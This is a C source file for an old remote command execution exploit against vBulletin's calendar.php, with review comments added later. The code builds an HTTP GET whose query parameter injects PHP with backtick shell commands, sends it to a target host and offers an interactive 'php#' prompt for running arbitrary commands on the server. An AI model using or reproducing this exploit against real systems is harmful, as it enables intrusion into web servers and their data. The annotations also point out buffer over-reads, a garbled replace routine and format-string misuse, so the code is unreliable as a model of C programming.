/* php2.c - vBulletin calendar.php remote command execution exploit
*
* This code is the published property of gosper.
* Successful use leads to command execution as gid apache.
*
* thanks and shouts go out to ectos and tgrey ;)
*
* (C) COPYRIGHT Gosper , 2002 - gosper@nix.org
* all rights reserved
***********************************************************************
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

/* TCP port the client connects to (plain HTTP). */
#define PORT 80
/* Size in bytes of the request and scratch buffers used throughout the file. */
#define MAX 200
/*
 * evil1 and evil2 are the fixed prefix and suffix of the query string; the
 * operator's command text is placed between them.
 *
 * Decoding the percent-escapes visible here: %22 is a double quote, %20 a
 * space and %60 a backtick. The "comma" parameter therefore carries a quote
 * followed by a semicolon, PHP statements (echo, die()) and a backtick-quoted
 * section.
 * NOTE(review): presumably the server-side script places the comma value
 * inside PHP code that it evaluates, which is what would let the quote end a
 * string literal there - the script itself is not shown on this page.
 *
 * For defenders: the reviewable artefact is a GET for calendar.php whose
 * comma parameter contains an encoded double quote, a semicolon and encoded
 * backticks. Such requests in web-server access logs merit investigation,
 * and the remedy lies in the server-side script (a vendor-fixed release),
 * not in anything this client does.
 */
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"

char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);

/*
 * Entry point. Treats argv[1] as the target host, walks the options with
 * getopt, then formats a single request line into buf and passes it to
 * exploit(). With no arguments it prints the usage text instead.
 *
 * The request line built here is "GET " + evil1 + command + evil2 + "\n":
 * it carries no path prefix in front of /calendar.php and no HTTP version
 * token, so on the wire it is a bare "GET <uri>" line.
 *
 * NOTE(review): command and path are only assigned inside the -c and -i
 * cases; nothing initialises them otherwise, and the sprintf into the
 * MAX-byte buf is not length-checked. getopt is called although <unistd.h>
 * is not among the includes shown.
 */
int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;

if(argc > 1) {
host = argv[1]; // make things easier
/* Option letters accepted: i, c and p take an argument, d does not.
   There is no case for 'p', so it lands in default and prints usage. */
while((res = getopt(argc, argv, "i:c:p:d")) != EOF) {
switch(res){

case 'c': command = optarg;
break;

/* -i hands control to interactive(), whose loop has no exit, so the
   break below is not reached in practice. */
case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;

/* buf has not been written at this point (the sprintf comes after the
   loop), and there is no break: control falls through into default,
   where usage() exits the process. */
case 'd': printf("%s" , buf);

default: usage(argv[0]);
break;
}

}

sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;

}


/*
 * Resolves host with gethostbyname, opens a TCP connection to PORT, sends
 * the caller's request text, reads one reply with a single recv and prints
 * it to stdout, then closes the socket. Any resolve/socket/connect failure
 * prints a message and exits with -1.
 *
 * host   - name or address of the web server.
 * string - request line prepared by the caller.
 *
 * NOTE(review): the function is declared to return char but contains no
 * return statement. buf, buf2 and data are never used apart from
 * sizeof(buf2).
 */
char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];

struct hostent *he;
struct sockaddr_in server;

if((he =gethostbyname(host))==NULL) {
printf("Error unknown host :( \n");
exit(-1);
}

if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}

/* IPv4 destination: first resolved address, port PORT in network order. */
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);

if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}


/*
 * The length passed to send is sizeof(buf2), i.e. always 999 bytes, not the
 * length of string. Both callers in this file pass MAX-byte (200) buffers,
 * so the call reads past the end of the caller's array and whatever follows
 * the request line in memory goes out on the wire. For defenders this means
 * the request line is followed by unrelated trailing bytes rather than
 * well-formed HTTP headers.
 *
 * The return values of send and recv are ignored, and output is printed
 * with %s without a terminator being written after the received bytes.
 */
send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);

close(fd);
}

/*
 * Prompt loop: prints a banner, then repeatedly reads one line from stdin,
 * replaces each space with "%20", formats a request line as
 * "GET " + path + evil1 + line + evil2 + "\n" and passes it to exploit().
 * The loop has no exit condition, so the function does not return.
 *
 * host - target web server, forwarded unchanged to exploit().
 * path - prefix placed in front of /calendar.php in the request line.
 *
 * Only spaces are percent-encoded; every other character of the typed line
 * goes into the URL as typed.
 *
 * NOTE(review): the fgets result is not checked. input is allocated with
 * strlen(shell) bytes and filled with strlen(shell)-1 bytes by memcpy,
 * which writes no terminator, yet it is then consumed by %s. The allocation
 * is not checked and never freed, and the sprintf into the MAX-byte temp is
 * not length-checked.
 */
void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;

printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");

while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
/* Copy the line without its last character (the newline fgets keeps). */
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}

/*
 * Intended as an in-place replace of every occurrence of find in string
 * with replace, rebuilding the text in the local buffer final and writing
 * it back into string on each pass.
 *
 * string  - buffer to rewrite; the result is written back into it.
 * find    - substring to look for.
 * replace - text substituted for each occurrence.
 *
 * NOTE(review): as listed on this page the inner loop never uses i to index
 * string: the condition compares the pointer itself with '\0' and the body
 * assigns the pointer to a char. The listing may have been altered when it
 * was posted; in this form the function does not perform the copy its name
 * suggests.
 *
 * NOTE(review): final is MAX bytes and is filled with strncat/strcat
 * without any bound; the result is written back into the caller's buffer,
 * which can be smaller than the expanded text (interactive() passes a
 * 100-byte array and each space grows to three bytes); and final is passed
 * to sprintf as the format string, so '%' characters in it - including the
 * ones just inserted by "%20" - are interpreted as conversions.
 */
void search_replace(char *string, const char *find, const char *replace)
{

char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
/* Offsets of the match: [start, end) is the span occupied by find. */
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
/* Text before the match, then the replacement. */
strncat(final, string, start);
strcat(final, replace);
for (i = end; string != '\0'; i++) {
temp[0] = string;
strcat(final, temp);
}
sprintf(string, final);
}
return;
}

/*
 * Prints the banner and the invocation syntax to stdout, then ends the
 * process with exit status 1.
 *
 * progname - program name shown in the usage and example lines.
 */
void usage(char *progname) {
    /* Fixed banner lines carry no conversions, so they are written as-is. */
    fputs("_________\n", stdout);
    fputs(" calendar.php vbulletin exploit\n", stdout);
    fputs(" (C) COPYRIGHT Gosper 2002\n", stdout);
    fputs(" gosper@nix.org\n\n", stdout);

    /* The two lines that mention the program name. */
    printf(" Usage: %s host -i path to calendar.php\n" , progname);
    printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);

    exit(1);
}
 
